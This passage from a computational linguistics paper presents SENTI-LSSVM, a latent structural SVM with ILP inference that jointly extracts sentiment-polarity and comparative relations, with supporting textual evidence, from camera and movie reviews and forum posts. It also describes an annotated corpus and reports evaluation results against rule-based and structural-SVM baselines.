whole. In contrast, an instance of compar- ative relation is in the form of preferred{entity, en- tity, attribute}, e.g. preferred(Canon 7D, Nikon D7000, price). For brevity, we refer to an instance set of sentiment-oriented relations extracted from a sentence as an sSoR. To represent the instances of the remaining relations, we represent them as other{entity, attribute}, such as textitpartOf{wheel, car}. These relations include objective relations and the subjective relations other than sentiment- oriented relations. Mention-Based Relation Instances. A mention- based relation instance refers to a tuple of entity mentions with a certain relation. This concept is in- troduced as the representation of instances in a sen- tence by replacing entities with the corresponding entity mentions, such as positive(“Canon SD880i”, “wide angle view”). Figure 1: An example of MRG. Mention-Based Relation Graph. A mention-based relation graph (or MRG ) represents a collection of mention-based relation instances expressed in a sen- tence. As illustrated in Figure 1, an MRG is a di- rected hypergraph G = 〈M,E〉 with a vertex set M and an edge set E. A vertex mi ∈ M denotes a mention of an entity or an attribute occurring ei- ther within the sentence or in its context. We say that a mention is from the context if it is mentioned in the previous sentence or is an attribute implied in the current sentence. An instance of a binary re- lation in an MRG takes the form of a binary edge el = (mi,ma), where mi and ma denote an en- tity mention and an attribute mention respectively, and the type l ∈ {positive, negative, other}. A ternary edge el indicating comparative relation is represented as el = (mi,mj,ma), where two en- tity mentions mi and mj are compared with respect to the attribute mention ma. We define the type l ∈ {better,worse} to indicate two possible direc- tions of the relation and assume mi occurs before mj. As a result, we have a set L of five relation types: positive, negative, better, worse or other. Ac- cording to these definitions, the annotations in the SRG corpus are actually MRGs and disambiguated entities. If there are multiple mentions referring to the same entity, annotators are asked to choose the 157 most obvious one because it saves annotation time and is less demanding for the entity recognition and diambiguation modules. Figure 2: An example of eMRG. The textual evi- dences are wrapped by green dashed boxes. Evidentiary Mention-Based Relation Graph. An evidentiary mention-based relation graph, coined eMRG , extends an MRG by associating each edge with a textual evidence to support the corresponding relation assertions (see Figure 2). Consequently, an edge in an eMRG is denoted by a pair (a,c), where a represents a mention-based relation instance and c is the associated textual evidence. It is also re- ferred to as an evidentiary edge. represented as el = (mi,mj,ma), an MRG as an evidentiary MRG (eMRG) and the edges of eMRGs as evidentiary edges, as shown in Figure 2. 3.2 System Architecture Figure 3: System architecture. As illustrated by Figure 3, at the core of our sys- tem is the SENTI-LSSVM model, which extracts sets of mention-based relationships in the form of eMRGs from sentences. For a given sentence with known entity mentions, we select all possible mention sets as relation candidates, where each set includes at least one entity mention. Then we associate each relation candidate with a set of constituents or the whole sentence as the textual evidence candidates (cf. Section 6.1). Subsequently, the inference com- ponent aims to find the most likely eMRG from all possible combinations of mention-based relation in- stances and their textual evidences (cf. Section 6.2). The representation eMRG is chosen because it char- acterizes exactly the model outputs by letting each edge correspond to an instance of mention-based re- lation and the associated textual evidence. Finally, the model parameters of this model are learned by an online algorithm (cf. Section 7). Since instance sets of sentiment-oriented relations (sSoRs) are the expected outputs, we can obtain sSoRs from MRGs by using a simple rule-based al- gorithm. The algorithm essentially maps the men- tions from an MRG into entities and attributes in an sSoR and label the corresponding tuples with the re- lation types of the edges from an MRG. For instances of comparative relation, the label better or worse is mapped to the relation type preferred. 4 SENTI-LSSVM Model The task of sentiment-oriented relation extraction is to determine the most likely sSoR in a sentence. Since sSoRs are derived from the corresponding MRGs as described in Section 3, the task is reduced to find the most likely MRG for each sentence. Since an MRG is created by assigning relation types to a subset of all relation candidates, which are possible tuples of mentions with unknown relation types, the number of MRGs can be extremely high. To tackle the task, one solution is to employ an edge-factored linear model in the framework of structural SVM (Martins et al., 2009; Tsochantaridis et al., 2004). The model suggests that a bag of fea- tures should be specified for each relation candidate, and then the model predicts the most likely candi- date sets along with their relation types to form the optimal MRGs. As we observed, for a relation can- didate, the most informative features are the words near its entity mentions in the original text. How- 158 ever, if we represent a candidate by all these words, it is very likely that the instances of different relation types share overly similar features, because a men- tion is often involved in more than one relation can- didate, as shown in Figure 2. As a consequence, the instances of different relations represented by overly similar features can easily confuse the learning algo- rithm. Thus, it is critical to select proper constituents or sentences as textual evidences for each relation candidate in both training and testing. Consequently, we divide the task of sentiment- oriented relation extraction into two subtasks : i) identifying the most likely MRGs; ii) assigning proper textual evidences to each edge of MRGs to support their relation assertions. It is desirable to carry out the two subtasks jointly as these two sub- tasks could enhance each other. First, the identifi- cation of relation types requires proper textual ev- idences; second, the soft and hard constraints im- posed by the correlated relation instances facilitate the recognition of the corresponding textual evi- dences. Since the eMRGs are created by attaching every MRG with a set of textual evidences, tackling the two subtasks simultaneously is equivalent to se- lecting the most likely eMRG from a set of eMRG candidates. It is challenging because our SRG corpus does not contain any annotation of textual evidences. Formally, let X denote the set of all available sen- tences, and we define y ∈ Y(x)(x ∈ X) as the set of labeled edges of an MRG and Y = ∪x∈XY(x). Since the assignments of textual evidences are not observed, an assignment of evidences to y is de- noted by a latent variable h ∈ H(x) and H = ∪x∈XH(x). Then (y,h) corresponds to an eMRG, and (a,c) ∈ (y,h) is a labeled edge a attached with a textual evidence c. Given a labeled dataset D = {(x1,y1), ..., (xn,yn)} ∈ (X ×Y)n, we aim to learn a discriminant function f : X →Y×H that outputs the optimal eMRG (y,h) ∈Y(x)×H(x) for a given sentence x. Due to the introduction of latent variables, we adopt the latent structural SVM (Yu and Joachims, 2009) for structural classification. Our discriminant function is defined as f(x) = argmax(y,h)∈Y(x)×H(x)β >Φ(x,y,h) (1) where Φ(x,y,h) is the feature function of an eMRG (y,h) and β is the corresponding weight vector. To ensure tractability, we also employ edge-based factorization for our model. Let Mp denote a set of entity mentions and yr(mi) be a set of edges labeled with sentiment-oriented relations incident to mi, the factorization of Φ(x,y,h) is given as Φ(x,y,h) = ∑ (a,c)∈(y,h) Φe(x,a,c) + (2) ∑ mi∈Mp ∑ a,a′∈yr(mi),a 6=a′ Φc(a,a ′) where Φe(x,a,c) is a local edge feature function for a labeled edge a attached with a textual evidence c and Φc(a,a′) is a feature function capturing co- occurrence of two labeled edges ami and a ′ mi inci- dent to an entity mention mi. 5 Feature Space The following features are used in the feature func- tions (Equation 2): Unigrams: As mentioned before, a textual evi- dence attached to an edge in MRG is either a word, phrase or sentence. We consider all lemmatized un- igrams in the textual evidence as unigram features. Context: Since web users usually express related sentiments about the same entity across sentence boundaries, we describe the sentiment flow using a set of contextual binary features. For example, if en- tity A is mentioned in both the previous sentence and the current sentence, a set of contextual binary fea- tures are used to indicate all possible combinations of the current and the previous mentioned sentiment- oriented relations regarding to entity A. Co-occurrence: We have mentioned the co- occurrence feature in Equation 2, indicated by Φc(a,a ′). It captures the co-occurrence of two la- beled edges incident to the same entity mention. Note that the co-occurrence feature function is con- sidered only if there is a contrast conjunction such as “but” between the non-shared entity mentions inci- dent to the two labeled edges. Senti-predictors: Following the idea of (Qu et al., 2012), we encode the prediction results from the rule-based phrase-level multi-relation predic- tor (Ding et al., 2009) and from the bag-of-opinions predictor (Qu et al., 2010) as features based on the textual evidence. The output of the first predictor is an integer value, while the output of the second predictor is a sentiment relation, such as “positive”, 159 “negative”, “better” or “worse”. We map the rela- tional outputs into integer values and then encode the outputs from both predictors as senti-predictor features. Others: The commonly used part-of-speech tags are also included as features. Moreover, for an edge candidate, a set of binary features are used to denote the types of the edge and its entity mentions. For in- stance, a binary feature indicates whether an edge is a binary edge related to an entity mentioned in con- text. To characterize the syntactic dependencies be- tween two adjacent entity mentions, we use the path in the dependency tree between the heads of the cor- responding constituents, the number of words and other mentions in-between as features. Additionally, if the textual evidence is a constituent, its feature w.r.t. an edge is the dependency path to the clos- est mention of the edge that does not overlap with this constituent. 6 Structural Inference In order to find the best eMRG for a given sentence with a well trained model, we need to determine the most likely relation type for each relation candi- date and support the corresponding assertions with proper textual evidences. We formulate this task as an Integer Linear Programming (ILP). Instead of considering all constituents of a sentence, we empir- ically select a subset as textual evidences for each relation candidate. 6.1 Textual Evidence Candidates Selection Textual evidences are selected based on the con- stituent trees of sentences parsed by the Stanford parser (Klein and Manning, 2003). For each men- tion in a sentence, we first locate a constituent in the tree with the maximal overlap by Jaccard sim- ilarity. Starting from this constituent, we consider two types of candidates: type I candidates are con- stituents at the highest level which contain neither any word of another mention nor any contrast con- junctions such as “but”; type II candidates are con- stituents at the highest level which cover exactly two mentions of an edge and do not overlap with any other mentions. For a binary edge connecting an en- tity mention and an attribute mention, we consider a type I candidate starting from the attribute men- tion. For a binary edge connecting two entity men- tions, we consider type I candidates starting from both mentions. Moreover, for a comparative ternary edge, we consider both type I and type II candidates starting from the attribute mention. This strategy is based on our observation that these candidates of- ten cover the most important information w.r.t. the covered entity mentions. 6.2 ILP Formulation We formulate the inference problem of finding the best eMRG as an ILP problem due to its convenient integration of both soft and hard constraints. Given the model parameters β, we reformulate the score of an eMRG in the discriminant function (1) as follows, β>Φ(x,y,h) = ∑ (a,c)∈(y,h) saczac + ∑ mi∈Mp ∑ a,a′∈yr(mi),a 6=a′ saa′zaa′ where sac = β >Φe(x,a,c) denotes the score of a labeled edge a attached with a textual evidence c, saa′ = β >Φc(a,a ′) is the edge co-occurrence score, the binary variable zac indicates the presence or ab- sence of the corresponding edge, and zaa′ indicates if two edges co-occurr. As not every edge set can form an eMRG, we require that a valid eMRG should satisfy a set of linear constraints, which form our constraint space. Then function (1) is equivalent to max z∈B s>z + µzd s.t. A   z η τ   ≤ d z,η,τ ∈ B where B = 2S with S = {0, 1}, and η and τ are auxiliary binary variables that help define the con- straint space. The above optimization problem takes exactly the form of an ILP because both the con- straints and the objective function are linear, and all variables take only integer values. In the following, we consider two types of con- straint space, 1) an eMRG with only binary edges and 2) an eMRG with both binary and ternary edges. 160 eMRG with only Binary Edges: An eMRG has only binary edges if a sentence contains no attribute mention or at most one entity mention. We expect that each edge has only one relation type and is sup- ported by a single textual evidence. To facilitate the formulation of constraints, we introduce ηel to de- note the presence or absence of a labeled edge el, and ηec to indicate if a textual evidence c is assigned to an unlabeled edge e. Then the binary variable for the corresponding evidentiary edge zelc = ηec ∧ηel , where the ILP formulation of conjunction can be found in (Martins et al., 2009). Let Ce denote the set of textual evidence candi- dates of an unlabeled edge e. The constraint of at most one textual evidence per edge is formulated as: ∑ c∈Ce ηec ≤ 1 (3) Once a textual evidence is assigned to an edge, their relation labels should match and the number of labeled edges must agree with the number of at- tached textual evidences. Further, we assume that a textual evidence c conveys at most one relation so that an evidence will not be assigned to the relations of different types, which is the main problem for the structural SVM based model. Let ηcl indicate that the textual evidence c is labeled by the relation type l. The corresponding constraints are expressed as, ∑ l∈Le ηel = ∑ c∈Ce ηec; zelc ≤ ηcl; ∑ l∈L ηcl ≤ 1 where Le denotes the set of all possible labels for an unlabeled edge e, and L is the set of all relation types of MRGs (cf. Section 3). In order to avoid a textual evidence being overly reused by multiple relation candidates, we first pe- nalize the assignment of a textual evidence c to a labeled edge a by associating the corresponding zac with a fixed negative cost −µ in the objective func- tion. Then the selection of one textual evidence per edge a is encouraged by associating µ to zdc in the objective function, where zdc = ∨ e∈Sc ηec and Sc is the set of edges that the textual evidence c serves as a candidate. The disjunction zdc is expressed as: zdc ≥ ηe,e ∈ Sc zdc ≤ ∑ e∈Sc ηe (a) Binary edge structure (b) Ternary edge structure Figure 4: Alternative structures associated with an attribute mention. This soft constraint not only encourages one textual evidence per edge, but also keeps it eligible for mul- tiple assignments. For any two labeled edge a and a′ incident to the same entity mention, the edge-to-edge co- occurrence is described by zca,a′ = za ∧za′ . eMRG with both Binary and Ternary Edges: If there are more than one entity mentions and at least one attribute mention in a sentence, an eMRG can potentially have both binary and ternary edges. In this case, we assume that each mention of attributes can participate either in binary relations or in ternary relations. The assumption holds in more than 99.9% of the sentences in our SRG corpus, thus we describe it as a set of hard constraints. Geometrically, the as- sumption can be visualized as the selection between two alternative structures incident to the same at- tribute mention, as shown in Figure 4. Note that, in the binary edge structure, we include not only the edges incident to the attribute mention but also the edge between the two entity mentions. Let Sbmi be the set of all possible labeled edges in a binary edge structure of an attribute mention mi. Variable τbmi = ∨ el∈Sbmi ηel indicates whether the attribute mention is associated with a binary edge structure or not. In the same manner, we use τtmi = ∨ el∈Stmi ηel to indicate the association of the an attribute mention mi with an ternary edge struc- ture from the set of all incident ternary edges Stmi . The selection between two alternative structures is 161 formulated as τbmi + τ t mi = 1. As this influences only the edges incident to an attribute mention, we keep all the constraints introduced in the previous section unchanged except for constraint (3), which is modified as ∑ c∈Ce ηec ≤ τbmi ; ∑ c∈Ce ηec ≤ τtmi Therefore, we can have either binary edges or ternary edges for an attribute mention. 7 Learning Model Parameters Given a set of training sentences D = {(x1,y1), . . . , (xn,yn)}, the best weight vec- tor β of the discriminant function (1) is found by solving the following optimization problem: min β 1 n n∑ i=1 [ max (ŷ,ĥ)∈Y(x)×H(x) (β>Φ(x,ŷ, ĥ)+δ(ĥ, ŷ,y)) − max h̄∈H(x) β>Φ(x,y, h̄)] + ρ|β|] (4) where δ(ĥ, ŷ,y) is a loss function measuring the dis- crepancies between an eMRG (y,h̄) with gold stan- dard edge labels y and an eMRG (ŷ, ĥ) with inferred labeled edges ŷ and textual evidences ĥ. Due to the sparse nature of the lexical features, we apply L1 regularizer to the weight vector β, and the degree of sparsity is controlled by the hyperparameter ρ. Since the L1 norm in the above optimization problem is not differentiable at zero, we apply the online forward-backward splitting (FOBOS) algo- rithm (Duchi and Singer, 2009). It requires two steps for updating the weight vector β by using a single training sentence x on each iteration t. βt+ 1 2 = βt −εt∆t βt+1 = arg min β 1 2 ‖β −βt‖2 + εtρ|β| where ∆t is the subgradient computed without con- sidering the L1 norm and εt is the learning rate. For a labeled sentence x, ∆t = Φ(x,ŷ∗, ĥ∗) − Φ(x,y, h̄∗), where the feature functions of the corre- sponding eMRGs are inferred by solving (ŷ∗, ĥ∗) = arg max (ĥ,ŷ)∈H(x)×Y(x)[β >Φ(x,ŷ, ĥ) + δ(ĥ, ŷ,y)] and (y,h̄∗) = arg maxh̄∈H(x) β >Φ(x,y, h̄), as in- dicated in the optimization problem (4). The former inference problem is similar to the one we considered in the previous section except the inclusion of the loss function. We incorporate the loss function into the ILP formulation by defin- ing the loss between an MRG (y,h) and a gold stan- dard MRG as the sum of per-edge costs. In our ex- periments, we consider a positive cost ϕ for each wrongly labeled edge a, so that if an edge a has a different label from the gold standard, we add ϕ to the coefficient sac of the corresponding variable zac in the objective function of the ILP formulation. In addition, since the non-positive weights of edge labels in the initial learning phrase often lead to eMRGs with many unlabeled edges, which harms the learning performance, we fix it by adding a con- straint for the minimal number of labeled edges in an eMRG, ∑ a∈A ∑ c∈Ca ηac ≥ ζ (5) where A is the set of all labeled edge candidates and ζ denotes the minimal number of labeled edges. Empirically, the best way to determine ζ is to make it equal to the maximal number of labeled edges in an eMRG with the restriction that a tex- tual evidence can be assigned to at most one edge. By considering all the edge candidates A and all the textual evidence candidates C as two vertex sets in a bipartite graph Ĝ = 〈V = (A,C),E〉 (with edges in E indicating which textual evidence can be assigned to which edge), ζ corresponds to exactly the size of a maximum matching of the bipartite graph1. To find the optimal eMRG (y,h̄∗), for the gold la- bel k of each edge, we consider the following set of constraints for inference since the labels of the edges are known for the training data, ∑ c∈Ce ηec ≤ 1; ηec ≤ lck ∑ k′∈L lck′ ≤ 1; ∑ e∈Sc ηec ≤ 1 We include also the soft constraints, which avoid a textual evidence being overly reused by multiple relations, and the constraints similar to (5) to ensure a minimal number of labeled edges and a minimal number of sentiment-oriented relations. 1It is computed by the Hopcroft-Karp algorithm (Hopcroft and Karp, 1973) in our implementation. 162 8 SRG Corpus For evaluation we constructed the SRG corpus, which in total consists of 1686 manually annotated online reviews and forum posts in the digital camera and movie domains2. For each domain, we maintain a set of attributes and a list of entity names. The annotation scheme for the sentiment repre- sentation asserts minimal linguistic knowledge from our annotators. By focusing on the meanings of the sentences, the annotators make decisions based on their language intuition, not restricted by specific syntactic structures. Taking the example in Figure 2, the annotators only need to mark the mentions of entities and attributes from both the sentences and the context, disambiguate them, and label (“Canon 7D”, “Nikon D7000”, price) as worse and (“Canon 7D”, “sensor”) as positive, whereas in prior work, people have annotated the sentiment-bearing expres- sions such as “great” and link them to the respective relation instances as well. This also enables them to annotate instances of both sentiment polarity and comparative relaton, which are conveyed by not only explicit sentiment-bearing expressions like “excel- lent performance”, but also factual expressions im- plying evaluations such as “The 7V has 10x optical zoom and the 9V has 16x.”. Camera Movie Reviews Forums Reviews Forums positive 386 1539 879 905 negative 165 363 529 331 comparison 30 480 39 35 Table 1: Distribution of relation instances in SRG corpus. 14 annotators participated in the annotation project. After a short training period, annotators worked on randomly assigned documents one at a time. For product reviews, the system lists all rel- evant information about the entity and the prede- fined attributes. For forum posts, the system shows only the attribute list. For each sentence in a doc- ument, the annotator first determines if it refers to an entity of interest. If not, the sentence is marked 2The 107 camera reviews are from bestbuy.com and Ama- zon.com; the 667 camera forum posts are downloaded from fo- rum.digitalcamerareview.com; the 138 movie reviews and 774 forum posts are from imdb.com and boards.ie respectively as off-topic. Otherwise, the annotator will identify the most obvious mentions, disambiguate them, and mark the MRGs. We evaluate the inter-annotator agreement on sSoRs in terms of Cohen’s Kappa (κ) (Cohen, 1968). An average Kappa value of 0.698 was achieved on a randomly selected set consisting of 412 sentences. Table 1 shows the corpus distribution after nor- malizing them into sSoRs. Camera forum posts con- tain the largest proportion of comparisons because they are mainly about the recommendation of dig- ital cameras. In contrast, web users are much less interested in comparing movies, in both reviews and forums. In all subsets, positive relations play a dom- inant role since web users intend to express more positive attitudes online than negative ones (Pang and Lee, 2007). 9 Experiments This section describes the empirical evaluation of SENTI-LSSVM together with two competitive base- lines on the SRG corpus. 9.1 Experimental Setup We implemented a rule-based baseline (DING- RULE) and a structural SVM (Tsochantaridis et al., 2004) baseline (SENTI-SSVM) for comparison. The former system extends the work of Ding et al. (2009), which designed several linguistically- motivated rules based on a sentiment polarity lexi- con for relation identification and assumes there is only one type of sentiment relation in a sentence. In our implementation, we keep all the rules of (Ding et al., 2009) and add one phrase-level rule when there are more than one mention in a sentence. The ad- ditional rule assigns sentiment-bearing words and negators to its nearest relation candidates based on the absolute surface distance between the words and the corresponding mentions. In this case, the phrase- level sentiment-oriented relations depend only on the assigned sentiment words and negators. The lat- ter system is based on a structural SVM and does not consider the assignment of textual evidences to relation instances during inference. The textual fea- tures of a relation candidate are all lexical and sen- timent predictor features within a surface distance of four words from the mentions of the candidate. 163 Thus, this baseline does not need the inference con- straints of SENTI-LSSVM for the selection of textual evidences. To gain more insights into the model, we also evaluate the contribution of individual fea- tures of SENTI-LSSVM. In addition, to show if identi- fying sentiment polarities and comparative relations jointly works better than tackling each task on its own, we train SENTI-LSSVM for each task separately and combine their predictions according to compat- ibility rules and the corresponding graph scores. For each domain and text genre, we withheld 15% documents for development and use the remaining for cross validation. The hyperparameters of all sys- tems are tuned on the development datasets. For all experiments of SENTI-LSSVM, we use ρ = 0.0001 for the L1 regularizer in Eq.(4) and ϕ = 0.05 for the loss function; and for SENTI-SSVM, ρ = 0.0001 and ϕ = 0.01. Since the relation type of off-topic sentences is certainly other, we evaluate all systems with 5-fold cross-validation only on the on-topic sentences in the evaluation dataset. Since the same sSoR can have several equivalent MRGs and the rela- tion type other is not of our interest, we evaluate the sSoRs in terms of precision, recall and F-measure. All reported numbers are averages over the 5 folds. 9.2 Results Table 2 shows the complete results of all sys- tems. Here our model SENTI-LSSVM outperformed all baselines in terms of the average F-measure scores and recalls by a large margin. The F-measure on movie reviews is about 14% over the best base- line. The rule-based system has higher precision than recall in most cases. However, simply increas- ing the coverage of the domain independent senti- ment polarity lexicon might lead to worse perfor- mance (Taboada et al., 2011) because many sen- timent oriented relations are conveyed by domain dependent expressions and factual expressions im- plying evaluations, such as “This camera does not have manual control.” Compared to DING-RULE, SENTI-SSVM performs better in the camera domain but worse for the movies due to many misclassi- fication of negative relation instances as other. It also wrongly predicted more positive instances as other than SENTI-LSSVM. We found that the recalls of these instances are low because they often have overly similar features with the instances of the type other linking to the same mentions. The problem gets worse in the movie domain since i) many sen- tences contain no explicit sentiment-bearing words; ii) the prior polarity of the sentiment-bearing words do not agree with their contextual polarity in the sentences. Consider the following example from a forum post about the movie “Superman Returns”: “Have a look at Superman: the Animated Series or Justice League Unlimited . . . that is how the char- acters of Superman and Lex Luthor should be.”. In contrast, our model minimizes the overlapping fea- tures by assigning them to the most likely relation candidates. This leads to significantly better per- formance. Although SENTI-SSVM has low recall for both positive and negative relations, it achieves the highest recall for the comparative relation among all systems in the movie domain and camera reviews. Since less than 1% of all instances are for compara- tive relations in these document sets and all models are trained to optimize the overall accuracy, SENTI- LSSVM intends to trade off the minority class for the overall better performance. This advantage disap- pears on the camera forum posts, where the number of instances of comparative relation is 12 times more than that in the other data sets. All systems perform better in predicting positive relations than the negative ones. This corresponds well to the empirical findings in (Wilson, 2008) that people intend to use more complex expressions for negative sentiments than their affirmative counter- parts. It is also in accordance with the distribution of these relations in our SRG corpus which is randomly sampled from the online documents. For learning systems, it can also be explained by the fact that the training data for positive relations are considerably more than those for negative ones. The comparative relation is the hardest one to process since we found that many corresponding expressions do not contain explicit keywords for comparison. To understand the performance of the key fea- ture groups in our model better, we remove each group from the full SENTI-LSSVM system and eval- uate the variations with movie reviews and camera forum posts, which have relatively balanced distri- bution of relation types. As shown in Table 3, the features from the sentiment predictors make signif- icant contributions for both datasets. The differ- ent drops of the performance indicate that the po- 164 Positive Negative Comparison Micro-average P R F P R F P R F P R F C am er a Fo ru m DING-RULE 56.4 39.0 46.1 46.2 24.0 31.6 42.6 14.0 21.0 53.4 30.8 39.0 SENTI-SSVM 60.2 35.6 44.8 44.2 38.5 41.2 28.0 40.1 32.9 43.7 36.7 39.9 SENTI-LSSVM 69.2 38.9 49.8 50.8 39.3 44.3 42.6 35.1 38.5 56.5 38.0 45.4 C am er a R e- vi ew DING-RULE 83.6 69.0 75.6 68.6 38.8 49.6 30.0 16.9 21.6 81.1 58.6 68.1 SENTI-SSVM 72.6 75.4 74.0 63.9 62.5 63.2 28.0 38.9 32.5 68.1 70.4 69.3 SENTI-LSSVM 77.3 85.4 81.2 68.9 61.3 64.9 22.3 20.7 21.6 73.1 73.4 73.7 M ov ie Fo ru m DING-RULE 63.7 37.4 47.1 27.6 34.3 30.6 8.9 5.6 6.8 48.2 35.9 41.2 SENTI-SSVM 66.2 30.1 41.3 25.6 17.3 20.7 44.2 56.7 49.7 53.3 27.9 36.6 SENTI-LSSVM 63.3 44.2 52.1 29.7 45.6 36.0 40.1 45.0 42.4 49.7 44.6 47.0 M ov ie R e- vi ew DING-RULE 66.5 47.2 55.2 42.0 39.1 40.5 31.4 12.0 17.4 56.2 44.0 49.4 SENTI-SSVM 61.3 54.0 57.4 45.2 13.7 21.1 24.5 63.3 35.3 54.6 39.2 45.7 SENTI-LSSVM 59.0 79.1 67.6 53.3 51.4 52.3 28.3 34.0 30.9 57.9 68.8 62.9 Table 2: Evaluation results for DING-RULE, SENTI-SSVM and SENTI-LSSVM. Boldface figures are statistically significantly better than all others in the same comparison group under t-test with p = 0.05. Feature Models Movie Reviews Camera Forums full system 62.9 45.4 ¬unigram 63.2 (+0.3) 41.2 (-4.2) ¬context 54.5 (-8.4) 46.0 (+0.6) ¬co-occurrence 62.6 (-0.3) 44.9 (-0.5) ¬senti-predictors 61.3 (-1.6) 34.3 (-11.1) Table 3: Micro-average F-measure of SENTI-LSSVM with different feature models larities predicted by rules are more consistent in camera forum posts than in movie reviews. Due to the complexity of expressions in the movie re- views our model cannot benefit from the unigram features but these features are a good compensation for the sentiment predictor features in camera fo- rum posts. The sharp drop by removing the context features from our model on movie reviews indicates that the sentiments in movie reviews depend highly on the relations of the previous sentences. In con- trast, the sentiment-oriented relations of the previ- ous sentences could be a reason of overfitting for camera forum data. The edge co-occurrence fea- tures do not play an important role in our model since the number of co-occurred sentiment-oriented relations in the sentences with contrast conjunctions like “but” is small. However, we found that allow- ing the co-occurrence of any sentiment-oriented re- lations would harm the performance of the model. In addition, our experiments showed that the sep- arated approach, which trains a model for senti- ment polarities and comparative relations respec- tively, leads to a decrease by almost 1% in terms of the F-measure averaged over all four datasets. The largest drop of F-measure is 3% on camera forum posts, since this dataset contains the largest propor- tion of comparative relations. We found that the er- rors are increased when the trained models make conflicting predictions. In this case, the joint ap- proach can take all factors into account and make more consistent decisions than the separated ap- proaches. 10 Conclusion We proposed SENTI-LSSVM model for extracting in- stances of both sentiment polarities and comparative relations. For evaluating and training the model, we created an SRG corpus by using a lightweight an- notation scheme. We showed that our model can automatically find textual evidences to support its relation predictions and achieves significantly bet- ter F-measure scores than alternative state-of-the-art methods. References Yejin Choi and Claire Cardie. 2009. Adapting a polarity lexicon using integer linear programming for domain- specific sentiment classification. In Proceedings of the 2009 Conference on Empirical Methods in Natural 165 Language Processing: Volume 2 - Volume 2, EMNLP ’09, pages 590–598, Stroudsburg, PA, USA. Associa- tion for Computational Linguistics. Yejin Choi and Claire Cardie. 2010. Hierarchical se- quential learning for extracting opinions and their at- tributes. In Proceedings of the Annual meeting of the Association for Computational Linguistics, pages 269–274. Association for Computational Linguistics. Yejin Choi, Eric Breck, and Claire Cardie. 2006. Joint extraction of entities and relations for opinion recog- nition. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 431– 439, Stroudsburg, PA, USA. Association for Compu- tational Linguistics. Jacob Cohen. 1968. Weighted Kappa: Nominal Scale Agreement Provision for Scaled Disagreement or Par- tial Credit. Psychological bulletin, 70(4):213. Xiaowen Ding, Bing Liu, and Philip S. Yu. 2008. A holistic lexicon-based approach to opinion mining. In Proceedings of the 2008 International Conference on Web Search and Data Mining, pages 231–240, New York, NY, USA. ACM. Xiaowen Ding, Bing Liu, and Lei Zhang. 2009. Entity discovery and assignment for opinion mining applica- tions. In Proceedings of the ACM SIGKDD Confer- ence on Knowledge Discovery and Data Mining, pages 1125–1134. John Duchi and Yoram Singer. 2009. Efficient online and batch learning using forward backward splitting. The Journal of Machine Learning Research, 10:2899– 2934. Murthy Ganapathibhotla and Bing Liu. 2008. Mining opinions in comparative sentences. In Proceedings of the 22nd International Conference on Computational Linguistics - Volume 1, pages 241–248, Stroudsburg, PA, USA. Association for Computational Linguistics. Namrata Godbole, Manjunath Srinivasaiah, and Steven Skiena. 2007. Large-scale sentiment analysis for news and blogs (system demonstration). In Proceed- ings of the International AAAI Conference on Weblogs and Social Media. John E Hopcroft and Richard M Karp. 1973. An nˆ5/2 algorithm for maximum matchings in bipartite graphs. SIAM Journal on computing, 2(4):225–231. Minqing Hu and Bing Liu. 2004. Mining and summa- rizing customer reviews. In Proceedings of the tenth ACM SIGKDD international conference on Knowl- edge discovery and data mining, Proceedings of the ACM SIGKDD Conference on Knowledge Discov- ery and Data Mining, pages 168–177, New York, NY, USA. ACM. Wei Jin, Hung Hay Ho, and Rohini K. Srihari. 2009. Opinionminer: a novel machine learning system for web opinion mining and extraction. In Proceedings of the 15th ACM SIGKDD international conference on Knowledge discovery and data mining, pages 1195– 1204, New York, NY, USA. ACM. Nitin Jindal and Bing Liu. 2006. Mining comparative sentences and relations. In Proceedings of the 21st In- ternational Conference on Artificial Intelligence - Vol- ume 2, AAAI’06, pages 1331–1336. AAAI Press. Richard Johansson and Alessandro Moschitti. 2011. Extracting opinion expressions and their polarities– exploration of pipelines and joint models. In Proceed- ings of the Annual meeting of the Association for Com- putational Linguistics, volume 11, pages 101–106. Jason S. Kessler, Miriam Eckert, Lyndsie Clark, and Nicolas Nicolov. 2010. The 2010 icwsm jdpa sent- ment corpus for the automotive domain. In 4th Inter- national AAAI Conference on Weblogs and Social Me- dia Data Workshop Challenge (ICWSM-DWC 2010). Soo-Min Kim and Eduard Hovy. 2006. Extracting opin- ions, opinion holders, and topics expressed in online news media text. In Proceedings of the Workshop on Sentiment and Subjectivity in Text, SST ’06, pages 1–8, Stroudsburg, PA, USA. Association for Computational Linguistics. Dan Klein and Christopher D. Manning. 2003. Accurate unlexicalized parsing. In Proceedings of the 41st An- nual Meeting on Association for Computational Lin- guistics - Volume 1, ACL ’03, pages 423–430, Strouds- burg, PA, USA. Association for Computational Lin- guistics. Lun-Wei Ku, Yu-Ting Liang, and Hsin-Hsi Chen. 2006. Opinion extraction, summarization and tracking in news and blog corpora. In AAAI Spring Sympo- sium: Computational Approaches to Analyzing We- blogs, pages 100–107. Bing Liu, Minqing Hu, and Junsheng Cheng. 2005. Opinion observer: analyzing and comparing opinions on the web. In Proceedings of the 14th international conference on World Wide Web, pages 342–351, New York, NY, USA. ACM. André L. Martins, Noah A. Smith, and Eric P. Xing. 2009. Concise integer linear programming formula- tions for dependency parsing. In Proceedings of the Annual meeting of the Association for Computational Linguistics, pages 342–350. Ryan T. McDonald, Kerry Hannan, Tyler Neylon, Mike Wells, and Jeffrey C. Reynar. 2007. Structured mod- els for fine-to-coarse sentiment analysis. In Proceed- ings of the Annual meeting of the Association for Com- putational Linguistics. Bo Pang and Lillian Lee. 2007. Opinion mining and sentiment analysis. Foundations and Trends in Infor- mation Retrieval, 2(1-2):1–135. 166 Ana-Maria Popescu and Oren Etzioni. 2005. Extract- ing product features and opinions from reviews. In Proceedings of the conference on Human Language Technology and Empirical Methods in Natural Lan- guage Processing, HLT ’05, pages 339–346, Strouds- burg, PA, USA. Association for Computational Lin- guistics. Lizhen Qu, Georgiana Ifrim, and Gerhard Weikum. 2010. The bag-of-opinions method for review rat- ing prediction from sparse text patterns. In Chu-Ren Huang and Dan Jurafsky, editors, Proceedings of the 23rd International Conference on Computational Lin- guistics (Coling 2010), ACL Anthology, pages 913– 921, Beijing, China. Tsinghua University Press. Lizhen Qu, Rainer Gemulla, and Gerhard Weikum. 2012. A weakly supervised model for sentence-level seman- tic orientation analysis with multiple experts. In Joint Conference on Empirical Methods in Natural Lan- guage Processing and Computational Natural Lan- guage Learning (EMNLP-CoNLL), pages 149–159, Jeju Island, Korea, July. Proceedings of the Annual meeting of the Association for Computational Linguis- tics. Richard Socher, Brody Huval, Christopher D. Manning, and Andrew Y. 